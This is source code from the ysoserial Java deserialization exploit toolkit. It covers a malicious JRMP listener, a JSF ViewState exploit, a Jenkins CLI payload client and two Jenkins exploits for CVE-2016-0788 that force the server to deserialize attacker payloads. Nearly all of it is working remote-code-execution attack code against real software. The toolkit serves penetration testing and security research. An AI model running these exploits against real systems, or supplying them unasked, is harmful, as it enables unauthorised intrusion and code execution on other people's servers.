import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;

import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;


/**
 * Generic JRMP listener
 *
 * Opens up a JRMP listener that will deliver the specified payload to any
 * client connecting to it and making a call.
 *
 * @author mbechler
 *
 */
@SuppressWarnings ( {
    "restriction"
} )
public class JRMPListener implements Runnable {

    // TCP port the server socket is created on.
    private int port;
    // Object written back to a caller inside the exceptional return (see doCall).
    private Object payloadObject;
    // Listening socket; created in the constructors, closed by close() and at the end of run().
    private ServerSocket ss;
    // Monitor that waitFor() sleeps on and that close()/doCall() signal.
    private Object waitLock = new Object();
    // Set by close() to stop the accept loop in run().
    // NOTE(review): exit and hadConnection are plain (non-volatile) fields that are read
    // outside waitLock from a different thread than the one writing them — confirm that
    // cross-thread visibility is not relied upon.
    private boolean exit;
    // Set by doCall() once a reply has been written to a caller.
    private boolean hadConnection;
    // Handed to JRMPClient.MarshalOutputStream in doCall(); only assigned by the
    // (port, className, classpathUrl) constructor and otherwise left null.
    private URL classpathUrl;


    /**
     * Creates the listener and its server socket for a ready-made payload object.
     *
     * No bind address is passed to the socket factory, so the socket is not restricted
     * to one local interface by this code.
     * NOTE(review): NumberFormatException is declared but nothing in this constructor parses a number.
     *
     * @param port TCP port to listen on
     * @param payloadObject object to return to callers
     * @throws IOException if the server socket cannot be created
     */
    public JRMPListener ( int port, Object payloadObject ) throws NumberFormatException, IOException {
        this.port = port;
        this.payloadObject = payloadObject;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    /**
     * Creates the listener with a generated placeholder object of the given class name
     * (see makeDummyObject) and a classpath URL that is later passed to the
     * marshalling output stream.
     *
     * @param port TCP port to listen on
     * @param className name given to the generated placeholder class
     * @param classpathUrl URL passed to JRMPClient.MarshalOutputStream when replying
     * @throws IOException if the server socket cannot be created
     */
    public JRMPListener (int port, String className, URL classpathUrl) throws IOException {
        this.port = port;
        this.payloadObject = makeDummyObject(className);
        this.classpathUrl = classpathUrl;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }


    /**
     * Waits until a caller has been answered or the timeout elapses.
     *
     * @param i timeout in milliseconds passed to Object.wait (0 waits until notified)
     * @return the value of hadConnection after waiting; false if the wait was interrupted
     */
    public boolean waitFor ( int i ) {
        try {
            // NOTE(review): this check happens outside the monitor, so a notifyAll() issued
            // between the check and the wait() below is missed; the method then sleeps for
            // the full timeout before reporting the (already true) flag.
            if ( this.hadConnection ) {
                return true;
            }
            System.err.println("Waiting for connection");
            synchronized ( this.waitLock ) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        }
        catch ( InterruptedException e ) {
            return false;
        }
    }


    /**
     * Stops the listener: raises the exit flag, closes the server socket (which makes a
     * blocked accept() fail) and wakes one thread waiting in waitFor().
     */
    public void close () {
        this.exit = true;
        try {
            this.ss.close();
        }
        // A failure to close is deliberately ignored; the listener is going away anyway.
        catch ( IOException e ) {}
        synchronized ( this.waitLock ) {
            this.waitLock.notify();
        }
    }


    /**
     * Command-line entry point: {@code <port> <payload_type> <payload_arg>}.
     *
     * Builds the payload object through ObjectPayload.Utils, runs the listener on the
     * calling thread and releases the payload when run() returns.
     */
    public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
            System.exit(-1);
            // Only reached if System.exit() does not terminate the JVM.
            return;
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            // run() is invoked directly, so this call blocks in the accept loop.
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }


    /**
     * Accept loop. Each connection is handled sequentially on this thread: the JRMP
     * header is validated, the transport protocol byte is read, and a single message is
     * processed by doMessage(). The statements below follow the wire order of the
     * handshake and must not be reordered.
     */
    public void run () {
        try {
            Socket s = null;
            try {
                while ( !this.exit && ( s = this.ss.accept() ) != null ) {
                    try {
                        // Bound the time a silent peer can hold this single-threaded loop (5000 ms read timeout).
                        s.setSoTimeout(5000);
                        InetSocketAddress remote = (InetSocketAddress) s.getRemoteSocketAddress();
                        System.err.println("Have connection from " + remote);

                        InputStream is = s.getInputStream();
                        InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is);

                        // Read magic (or HTTP wrapper)
                        // NOTE(review): the stream is marked, but no reset() appears in this
                        // method, so an HTTP-wrapped request is simply rejected by the check below.
                        bufIn.mark(4);
                        DataInputStream in = new DataInputStream(bufIn);
                        int magic = in.readInt();

                        short version = in.readShort();
                        // Anything that is not a JRMP header is dropped without a reply;
                        // the finally block below closes the socket a second time, which is harmless.
                        if ( magic != TransportConstants.Magic || version != TransportConstants.Version ) {
                            s.close();
                            continue;
                        }

                        OutputStream sockOut = s.getOutputStream();
                        BufferedOutputStream bufOut = new BufferedOutputStream(sockOut);
                        DataOutputStream out = new DataOutputStream(bufOut);

                        byte protocol = in.readByte();
                        switch ( protocol ) {
                        case TransportConstants.StreamProtocol:
                            // Acknowledge, tell the peer the endpoint it appears to connect
                            // from, then consume the endpoint (string + int) it sends back.
                            out.writeByte(TransportConstants.ProtocolAck);
                            if ( remote.getHostName() != null ) {
                                out.writeUTF(remote.getHostName());
                            } else {
                                out.writeUTF(remote.getAddress().toString());
                            }
                            out.writeInt(remote.getPort());
                            out.flush();
                            in.readUTF();
                            in.readInt();
                            // Intentional fall-through: after the stream handshake the
                            // message is handled exactly like the single-op case.
                        case TransportConstants.SingleOpProtocol:
                            doMessage(s, in, out, this.payloadObject);
                            break;
                        default:
                        case TransportConstants.MultiplexProtocol:
                            System.err.println("Unsupported protocol");
                            s.close();
                            continue;
                        }

                        // NOTE(review): doMessage() has already closed the socket at this
                        // point, so data still buffered here (e.g. a PingAck) is probably
                        // never delivered and the flush may throw into the catch below — confirm.
                        bufOut.flush();
                        out.flush();
                    }
                    catch ( InterruptedException e ) {
                        return;
                    }
                    catch ( Exception e ) {
                        // A failing connection is logged and the loop moves on to the next one.
                        e.printStackTrace(System.err);
                    }
                    finally {
                        System.err.println("Closing connection");
                        s.close();
                    }

                }

            }
            finally {
                // Last accepted socket and the server socket are released however the loop ends.
                if ( s != null ) {
                    s.close();
                }
                if ( this.ss != null ) {
                    this.ss.close();
                }
            }

        }
        catch ( SocketException e ) {
            // Expected when close() shuts the server socket while accept() is blocked.
            return;
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
    }


    /**
     * Reads one transport operation byte and dispatches on it, then closes the socket.
     *
     * @param s connection socket, closed before returning normally
     * @param in stream positioned after the protocol handshake
     * @param out stream for the reply
     * @param payload object forwarded to doCall for Call operations
     * @throws Exception IOException for an unknown operation, or whatever doCall raises
     */
    private void doMessage ( Socket s, DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
        System.err.println("Reading message...");

        int op = in.read();

        switch ( op ) {
        case TransportConstants.Call:
            // service incoming RMI call
            doCall(in, out, payload);
            break;

        case TransportConstants.Ping:
            // send ack for ping
            out.writeByte(TransportConstants.PingAck);
            break;

        case TransportConstants.DGCAck:
            // The UID is consumed from the stream; the value itself is not used.
            UID u = UID.read(in);
            break;

        default:
            throw new IOException("unknown transport op " + op);
        }

        s.close();
    }


    /**
     * Answers an incoming call: reads the target ObjID (and, for what is treated as a DGC
     * call, the method number, hash and ObjID array), then writes an exceptional return
     * whose exception object carries the payload, and finally signals waitFor().
     *
     * @param in stream positioned at the call data
     * @param out stream the return is written to
     * @param payload object stored in the returned exception's {@code val} field
     * @throws Exception MarshalException if the ObjID cannot be read, or any I/O/reflection failure
     */
    private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
        // Input from the peer is deserialized through an allow-list: only ObjID[], ObjID
        // and UID resolve, every other class name aborts the read. This is the
        // restriction that keeps the listener itself from deserializing arbitrary
        // classes sent by whoever connects.
        ObjectInputStream ois = new ObjectInputStream(in) {

            @Override
            protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
                if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
                    return ObjID[].class;
                } else if ("java.rmi.server.ObjID".equals(desc.getName())) {
                    return ObjID.class;
                } else if ( "java.rmi.server.UID".equals(desc.getName())) {
                    return UID.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };

        ObjID read;
        try {
            read = ObjID.read(ois);
        }
        catch ( java.io.IOException e ) {
            throw new MarshalException("unable to read objID", e);
        }


        // hashCode() == 2 is used as the test for a DGC call — presumably because the
        // well-known DGC object id has object number 2; confirm against ObjID.
        if ( read.hashCode() == 2 ) {
            ois.readInt(); // method
            ois.readLong(); // hash
            System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
        }

        System.err.println("Sending return with payload for obj " + read);

        out.writeByte(TransportConstants.Return);// transport op
        ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);

        oos.writeByte(TransportConstants.ExceptionalReturn);
        new UID().write(oos);

        // The payload travels as the 'val' field of a BadAttributeValueExpException, set
        // reflectively. Whether it has any effect depends entirely on the caller
        // deserializing this return value without a class restriction like the one
        // applied to 'ois' above.
        BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
        Reflections.setFieldValue(ex, "val", payload);
        oos.writeObject(ex);

        oos.flush();
        out.flush();

        // Record that a caller was answered and wake every thread blocked in waitFor().
        this.hadConnection = true;
        synchronized ( this.waitLock ) {
            this.waitLock.notifyAll();
        }
    }

    /**
     * Produces an instance of a copy of {@link Dummy} that has been renamed to
     * {@code className}, defined through a fresh anonymous ClassLoader.
     *
     * @param className name to give the generated class
     * @return the new instance, or an empty byte array if generation fails (the error is
     *         printed, not propagated)
     */
    @SuppressWarnings({"deprecation"})
    protected static Object makeDummyObject (String className) {
        try {
            // Separate loader so the renamed class does not collide with classes already loaded.
            ClassLoader isolation = new ClassLoader() {};
            ClassPool cp = new ClassPool();
            cp.insertClassPath(new ClassClassPath(Dummy.class));
            CtClass clazz = cp.get(Dummy.class.getName());
            clazz.setName(className);
            return clazz.toClass(isolation).newInstance();
        }
        catch ( Exception e ) {
            e.printStackTrace();
            // NOTE(review): callers receive a byte[0] instead of an error; they cannot tell
            // that class generation failed.
            return new byte[0];
        }
    }


    /**
     * Empty serializable template class that makeDummyObject copies and renames.
     */
    public static class Dummy implements Serializable {
        private static final long serialVersionUID = 1L;

    }
}


================================================
FILE: src/main/java/ysoserial/exploit/JSF.java
================================================
package ysoserial.exploit;


import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;

import org.apache.commons.codec.binary.Base64;

import ysoserial.payloads.ObjectPayload.Utils;


/**
 * JSF view state exploit
 * 
 * Delivers a gadget payload via JSF ViewState token.
 * 
 * This will only work if ViewState encryption/mac is disabled.
 * 
 * While it has been long known that client side state saving
 * with encryption disabled leads to RCE via EL injection,
 * this of course also works with deserialization gadgets.
 * 
 * Also, it turns out that MyFaces is vulnerable to this even when 
 * using server-side state saving
 * (yes, please, let's (de-)serialize a String as an Object).   
 * 
 * @author mbechler
 *
 */
public class JSF {

    /**
     * Command-line entry point: {@code <view_url> <payload_type> <payload_arg>}.
     *
     * Serializes the payload object with standard Java serialization, Base64- and
     * URL-encodes it, and POSTs it as the {@code javax.faces.ViewState} form field to
     * the given URL. The HTTP status line of the response is printed to stderr; any
     * failure is printed and swallowed. As the class comment states, the request only
     * has an effect when the receiving application does not encrypt/MAC its ViewState.
     */
    public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        final String payloadType = args[ 1 ];
        final Object payloadObject = Utils.makePayloadObject(payloadType, args[ 2 ]);

        try {
            final URLConnection conn = new URL(args[ 0 ]).openConnection();
            if ( ! ( conn instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            final HttpURLConnection http = (HttpURLConnection) conn;
            http.setDoOutput(true);
            http.setRequestMethod("POST");
            http.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");

            // The request body stream is obtained before the payload is serialized,
            // exactly as in the original statement order.
            final OutputStream body = http.getOutputStream();

            final String encodedState = URLEncoder.encode(Base64.encodeBase64String(toSerializedBytes(payloadObject)), "US-ASCII");
            final String form = "javax.faces.ViewState=" + encodedState;
            body.write(form.getBytes("US-ASCII"));
            body.close();

            System.err.println("Have response code " + http.getResponseCode() + " " + http.getResponseMessage());
        }
        catch ( Exception failure ) {
            failure.printStackTrace(System.err);
        }
        Utils.releasePayload(payloadType, payloadObject);

    }


    /**
     * Writes {@code value} through an ObjectOutputStream into memory and returns the bytes.
     */
    private static byte[] toSerializedBytes ( Object value ) throws java.io.IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        ObjectOutputStream objects = new ObjectOutputStream(buffer);
        objects.writeObject(value);
        objects.close();
        return buffer.toByteArray();
    }

}


================================================
FILE: src/main/java/ysoserial/exploit/JenkinsCLI.java
================================================
package ysoserial.exploit;

import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.net.URLConnection;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;

import javax.net.SocketFactory;

import hudson.remoting.Callable;
import hudson.remoting.Channel;
import hudson.remoting.Channel.Mode;
import hudson.remoting.ChannelBuilder;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;

/**
 * Jenkins CLI client
 * 
 * Jenkins unfortunately is still using a custom serialization based
 * protocol for remote communications only protected by a blacklisting
 * application level filter.
 * 
 * This is a generic client delivering a gadget chain payload via that protocol. 
 * 
 * @author mbechler
 *
 */
public class JenkinsCLI {

    /**
     * Command-line entry point: {@code <jenkins_url> <payload_type> <payload_arg>}.
     *
     * Looks up the CLI port advertised by the given URL, opens a remoting channel to it
     * and submits the payload object wrapped in a {@code getProperty} request. Failures
     * are printed and not rethrown; the channel is closed and the payload released in
     * every case.
     */
    public static final void main ( final String[] args ) {
        if ( args.length < 3 ) {
            System.err.println(JenkinsCLI.class.getName() + " <jenkins_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        final String payloadType = args[ 1 ];
        final Object payloadObject = Utils.makePayloadObject(payloadType, args[ 2 ]);
        final String baseUrl = args[ 0 ];

        Channel channel = null;
        try {
            channel = JenkinsCLI.openChannel(JenkinsCLI.getCliPort(baseUrl));
            channel.call(getPropertyCallable(payloadObject));
        }
        catch ( Throwable failure ) {
            failure.printStackTrace();
        }
        finally {
            if ( channel != null ) {
                try {
                    channel.close();
                }
                catch ( IOException closeError ) {
                    closeError.printStackTrace(System.err);
                }
            }
        }
        Utils.releasePayload(payloadType, payloadObject);
    }

    /**
     * Builds, by reflection, a {@code RemoteInvocationHandler$RPCRequest} for
     * {@code IChannel.getProperty(Object)} with object id 1 and {@code prop} as its
     * single argument.
     *
     * @param prop object passed as the property key; it is serialized as part of the request
     * @return the request, typed as a remoting Callable
     */
    public static Callable<?, ?> getPropertyCallable ( final Object prop )
            throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        // The request class and its constructor are not public, hence the reflective access.
        Constructor<?> rpcCtor = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest")
                .getDeclaredConstructor(int.class, Method.class, Object[].class);
        Reflections.setAccessible(rpcCtor);

        Method getProperty = Class.forName("hudson.remoting.IChannel").getMethod("getProperty", Object.class);
        Object[] callArgs = new Object[] { prop };
        Object request = rpcCtor.newInstance(1, getProperty, callArgs);
        return (Callable<?, ?>) request;
    }

    /**
     * Requests the given URL and combines its host with the port number found in the
     * {@code X-Jenkins-CLI-Port} response header.
     *
     * An HTTP status of 400 or above is only reported, not treated as fatal. If the
     * header is absent, Integer.parseInt receives null and throws NumberFormatException.
     *
     * @param jenkinsUrl base URL of the Jenkins instance
     * @return host of the URL paired with the advertised CLI port
     * @throws MalformedURLException if the URL is invalid or not an HTTP(S) URL
     */
    public static InetSocketAddress getCliPort ( String jenkinsUrl ) throws MalformedURLException, IOException {
        final URL base = new URL(jenkinsUrl);
        final URLConnection raw = base.openConnection();

        if ( raw instanceof HttpURLConnection ) {
            HttpURLConnection http = (HttpURLConnection) raw;
            if ( http.getResponseCode() >= 400 ) {
                System.err.println("* Error connection to jenkins HTTP " + base);
            }
            String advertised = http.getHeaderField("X-Jenkins-CLI-Port");
            int cliPort = Integer.parseInt(advertised);
            return new InetSocketAddress(base.getHost(), cliPort);
        }

        System.err.println("Not a HTTP URL");
        throw new MalformedURLException();
    }

    /**
     * Connects to the CLI port, sends the {@code Protocol:CLI-connect} preamble and
     * builds a binary-mode remoting Channel over the socket, backed by a cached pool of
     * daemon threads.
     *
     * @param isa address and port to connect to
     * @return the open channel; the caller is responsible for closing it
     */
    public static Channel openChannel ( InetSocketAddress isa ) throws IOException, SocketException {
        System.err.println("* Opening socket " + isa);
        final Socket sock = SocketFactory.getDefault().createSocket(isa.getAddress(), isa.getPort());
        sock.setKeepAlive(true);
        sock.setTcpNoDelay(true);

        System.err.println("* Opening channel");
        final OutputStream rawOut = sock.getOutputStream();
        new DataOutputStream(rawOut).writeUTF("Protocol:CLI-connect");

        // Daemon threads so that channel workers never keep the JVM alive on their own.
        final ThreadFactory daemonThreads = new ThreadFactory() {

            public Thread newThread ( Runnable task ) {
                Thread worker = new Thread(task, "Channel");
                worker.setDaemon(true);
                return worker;
            }
        };
        final ExecutorService workers = Executors.newCachedThreadPool(daemonThreads);

        final Channel channel = new ChannelBuilder("EXPLOIT", workers).withMode(Mode.BINARY).build(sock.getInputStream(), rawOut);
        System.err.println("* Channel open");
        return channel;
    }
}


================================================
FILE: src/main/java/ysoserial/exploit/JenkinsListener.java
================================================
package ysoserial.exploit;


import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.rmi.activation.ActivationDesc;
import java.rmi.activation.ActivationID;
import java.rmi.activation.ActivationInstantiator;

import javax.net.SocketFactory;

import hudson.remoting.Callable;
import hudson.remoting.Channel;
import hudson.remoting.JarLoader;
import sun.rmi.server.Util;
import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.JRMPListener;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;


/**
 * CVE-2016-0788 exploit (1)
 * 
 * 1. delivers a ysoserial.payloads.JRMPListener payload to jenkins via its remoting protocol.
 * 2. that payload causes the remote server to open up a JRMP listener (and export an object).
 * 3. connect to that JRMP listener and deliver any otherwise blacklisted payload.
 * 
 * Extra twist:
 * The well-known objects exported by the listener use the system classloader which usually
 * won't contain the targeted classes. Therefore we need to get ahold of the exported object's id
 * (which is using jenkins' classloader) that typically is properly randomized.
 * Fortunately - for the exploiting party - there is also a gadget that allows leaking
 * that identifier via an exception.
 * 
 * @author mbechler
 */
@SuppressWarnings ( {
    "rawtypes", "restriction"
} )
public class JenkinsListener {

    /**
     * Command-line entry point: {@code <jenkins_url> <payload_type> <payload_arg>}.
     *
     * Runs the three steps listed in the class comment in order. The statements depend
     * on each other's side effects on the remote channel and must stay in this order.
     * All failures are printed; none is rethrown.
     */
    public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JenkinsListener.class.getName() + " <jenkins_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        // Resolve and validate the payload type before any network activity.
        final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(args[ 1 ]);
        if ( payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass) ) {
            System.err.println("Invalid payload type '" + args[ 1 ] + "'");
            System.exit(-1);
        }

        String jenkinsUrl = args[ 0 ];
        // NOTE(review): the listener port is a fixed constant, not a parameter.
        int jrmpPort = 12345;

        Channel c = null;
        try {
            InetSocketAddress isa = JenkinsCLI.getCliPort(jenkinsUrl);
            c = JenkinsCLI.openChannel(isa);

            // Fetch the JarLoader channel property and read the numeric object id ('oid')
            // out of the returned proxy's invocation handler via reflection.
            Object call = c.call( JenkinsCLI.getPropertyCallable(JarLoader.class.getName() + ".ours"));
            InvocationHandler remote = Proxy.getInvocationHandler(call);
            int oid = Reflections.getField(Class.forName("hudson.remoting.RemoteInvocationHandler"), "oid").getInt(remote);

            System.err.println("* JarLoader oid is " + oid);

            // Step 1/2 of the class comment: the ysoserial.payloads.JRMPListener object for the port above.
            Object uro = new JRMPListener().getObject(String.valueOf(jrmpPort));
            
            Class<?> reqClass = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest");

            Object o = makeIsPresentOnRemoteCallable(oid, uro, reqClass);

            try {
                c.call((Callable<?, ?>) o);
            }
            catch ( Exception e ) {
                // The exception is the expected outcome of the call above: its message is
                // what carries the object id (see "Extra twist" in the class comment).
                // Example of the message text parsed by parseObjIdAndExploit:
                // [ActivationGroupImpl[UnicastServerRef [liveRef:
                // [endpoint:[172.16.20.11:12345](local),objID:[de39d9c:15269e6d8bf:-7fc1,
                // -9046794842107247609]]

                System.err.println(e.getMessage());

                parseObjIdAndExploit(args, payloadClass, jrmpPort, isa, e);
            }
            // NOTE(review): if the call returns without throwing, nothing further happens
            // and nothing is reported.

        }
        catch ( Throwable e ) {
            e.printStackTrace();
        }
        finally {
            if ( c != null ) {
                try {
                    c.close();
                }
                catch ( IOException e ) {
                    e.printStackTrace(System.err);
                }
            }
        }

    }


    /**
     * Builds, by reflection, an RPCRequest that invokes
     * {@code JarLoader.isPresentOnRemote(Checksum)} on the remote object {@code oid},
     * passing {@code uro} in place of the checksum argument.
     *
     * @param oid remote object id of the JarLoader
     * @param uro object sent as the single call argument
     * @param reqClass the RemoteInvocationHandler$RPCRequest class
     * @return the request instance
     */
    private static Object makeIsPresentOnRemoteCallable ( int oid, Object uro, Class<?> reqClass )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, ClassNotFoundException {
        Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
        Reflections.setAccessible(reqCons);
        return reqCons
                .newInstance(oid, JarLoader.class.getMethod("isPresentOnRemote", Class.forName("hudson.remoting.Checksum")), new Object[] {
                    uro,
        });
    }


    /**
     * Extracts the {@code objID:[<uid>, <objNum>]} portion from the exception message,
     * splits the UID into its three colon-separated hexadecimal parts and hands the
     * numbers to exploit().
     *
     * NOTE(review): e.getMessage() may be null, which would fail with a
     * NullPointerException rather than the "Failed to get object id" error; the number of
     * elements in 'parts' is not checked before indexing; and the third error message
     * repeats "separator" although it reports a missing closing bracket.
     *
     * @param args original command-line arguments; args[2] is the payload argument
     * @param payloadClass payload type to instantiate
     * @param jrmpPort port of the remote JRMP listener
     * @param isa address of the CLI port; only its host address is reused
     * @param e exception whose message contains the object id
     * @throws Exception if the expected markers are not found in the message
     */
    private static void parseObjIdAndExploit ( final String[] args, final Class<? extends ObjectPayload> payloadClass, int jrmpPort,
            InetSocketAddress isa, Exception e ) throws Exception, IOException {
        String msg = e.getMessage();
        int start = msg.indexOf("objID:[");
        if ( start < 0 ) {
            throw new Exception("Failed to get object id");
        }

        // ", " separates the UID from the object number.
        int sep = msg.indexOf(", ", start + 1);

        if ( sep < 0 ) {
            throw new Exception("Failed to get object id, separator");
        }

        int end = msg.indexOf("]", sep + 1);

        if ( end < 0 ) {
            throw new Exception("Failed to get object id, separator");
        }

        // 7 == "objID:[".length()
        String uid = msg.substring(start + 7, sep);
        String objNum = msg.substring(sep + 2, end);

        System.err.println("* UID is " + uid);
        System.err.println("* ObjNum is " + objNum);

        String[] parts = uid.split(":");

        // Object number is decimal; the three UID components are parsed as hexadecimal.
        long obj = Long.parseLong(objNum);
        int o1 = Integer.parseInt(parts[ 0 ], 16);
        long o2 = Long.parseLong(parts[ 1 ], 16);
        short o3 = Short.parseShort(parts[ 2 ], 16);

        exploit(new InetSocketAddress(isa.getAddress(), jrmpPort), obj, o1, o2, o3, payloadClass, args[ 2 ]);
    }


    /**
     * Opens a socket to the JRMP endpoint and writes a single-op call addressed to the
     * object identified by (obj, o1, o2, o3), followed by the serialized payload object.
     * The writes follow the wire order of the message and must not be reordered.
     * Exceptions are printed, not propagated; stream and socket are closed in all cases.
     *
     * @param isa JRMP endpoint to connect to
     * @param obj object number of the ObjID
     * @param o1 first UID component (written as int)
     * @param o2 second UID component (written as long)
     * @param o3 third UID component (written as short)
     * @param payloadClass payload type to instantiate
     * @param payloadArg argument passed to the payload's getObject
     * @throws IOException if closing the stream or socket fails
     */
    private static void exploit ( InetSocketAddress isa, long obj, int o1, long o2, short o3, Class<?> payloadClass, String payloadArg )
            throws IOException {
        Socket s = null;
        DataOutputStream dos = null;
        try {
            System.err.println("* Opening JRMP socket " + isa);
            s = SocketFactory.getDefault().createSocket(isa.getAddress(), isa.getPort());
            s.setKeepAlive(true);
            s.setTcpNoDelay(true);

            OutputStream os = s.getOutputStream();
            dos = new DataOutputStream(os);

            // Transport header: magic, version, protocol byte.
            dos.writeInt(TransportConstants.Magic);
            dos.writeShort(TransportConstants.Version);
            dos.writeByte(TransportConstants.SingleOpProtocol);

            dos.write(TransportConstants.Call);

            @SuppressWarnings ( "resource" )
            final ObjectOutputStream objOut = new JRMPClient.MarshalOutputStream(dos);

            // Object id: object number followed by the three UID components.
            objOut.writeLong(obj);
            objOut.writeInt(o1);
            objOut.writeLong(o2);
            objOut.writeShort(o3);

            // Operation number -1, then the hash of ActivationInstantiator.newInstance.
            objOut.writeInt(-1);
            objOut.writeLong(Util.computeMethodHash(ActivationInstantiator.class.getMethod("newInstance", ActivationID.class, ActivationDesc.class)));

            final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
            final Object object = payload.getObject(payloadArg);
            objOut.writeObject(object);
            // NOTE(review): only the raw socket stream is flushed here; objOut and dos are
            // not flushed explicitly before the finally block closes dos — confirm nothing
            // remains buffered in objOut.
            os.flush();
            ObjectPayload.Utils.releasePayload(payload, object);
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        finally {
            if ( dos != null ) {
                dos.close();
            }
            if ( s != null ) {
                s.close();
            }
        }
    }


}


================================================
FILE: src/main/java/ysoserial/exploit/JenkinsReverse.java
================================================
package ysoserial.exploit;


import java.io.IOException;
import java.net.InetSocketAddress;
import java.rmi.registry.Registry;
import java.util.Random;

import hudson.remoting.Channel;
import ysoserial.exploit.JRMPListener;
import ysoserial.payloads.JRMPClient;
import ysoserial.payloads.ObjectPayload.Utils;


/**
 * CVE-2016-0788 exploit (2)
 * 
 * - Sets up a local {@link JRMPListener}
 * - Delivers a {@link ysoserial.payloads.JRMPClient} payload via the CLI protocol 
 *   that will cause the remote to open a JRMP connection to our listener
 * - upon connection the specified payload will be delivered to the remote 
 *    (that will deserialize using a default ObjectInputStream)
 * 
 * @author mbechler
 *
 */
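public class JenkinsReverse {

    /**
     * Command-line entry point:
     * {@code <jenkins_url> <local_addr> <payload_type> <payload_arg>}.
     *
     * Starts a local {@link JRMPListener} on a random port in the range 1024-65535,
     * sends a {@link ysoserial.payloads.JRMPClient} object naming
     * {@code <local_addr>:<port>} over the CLI channel, and waits up to one second for
     * the listener to report that it answered a caller.
     *
     * Cleanup always runs in the same order: listener, channel, listener thread. The
     * listener is closed in the finally block so that a failure before the wait does not
     * leave the accept thread blocked, which would make the join below wait on it.
     * Failures are printed and not rethrown.
     */
    public static final void main ( final String[] args ) {
        if ( args.length < 4 ) {
            // The usage line names this class; it previously printed JenkinsListener's name.
            System.err.println(JenkinsReverse.class.getName() + " <jenkins_url> <local_addr> <payload_type> <payload_arg>");
            System.exit(-1);
        }


        final Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
        String myAddr = args[ 1 ];
        int jrmpPort = new Random().nextInt(65536 - 1024) + 1024;
        String jenkinsUrl = args[ 0 ];

        Thread t = null;
        Channel c = null;
        JRMPListener listener = null;
        try {
            InetSocketAddress isa = JenkinsCLI.getCliPort(jenkinsUrl);
            c = JenkinsCLI.openChannel(isa);
            listener = new JRMPListener(jrmpPort, payloadObject);
            t = new Thread(listener, "ReverseDGC");
            t.setDaemon(true);
            t.start();
            Registry payload = new JRMPClient().getObject(myAddr + ":" + jrmpPort);
            c.call(JenkinsCLI.getPropertyCallable(payload));
            listener.waitFor(1000);
        }
        catch ( Throwable e ) {
            e.printStackTrace();
        }
        finally {
            // Closing the server socket is what unblocks the accept loop; interrupt()
            // alone does not wake a thread blocked in accept().
            if ( listener != null ) {
                listener.close();
            }

            if ( c != null ) {
                try {
                    c.close();
                }
                catch ( IOException e ) {
                    e.printStackTrace(System.err);
                }
            }

            if ( t != null ) {
                t.interrupt();
                try {
                    t.join();
                }
                catch ( InterruptedException e ) {
                    e.printStackTrace(System.err);
                }
            }
        }
        Utils.releasePayload(args[2], payloadObject);
    }
}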


================================================
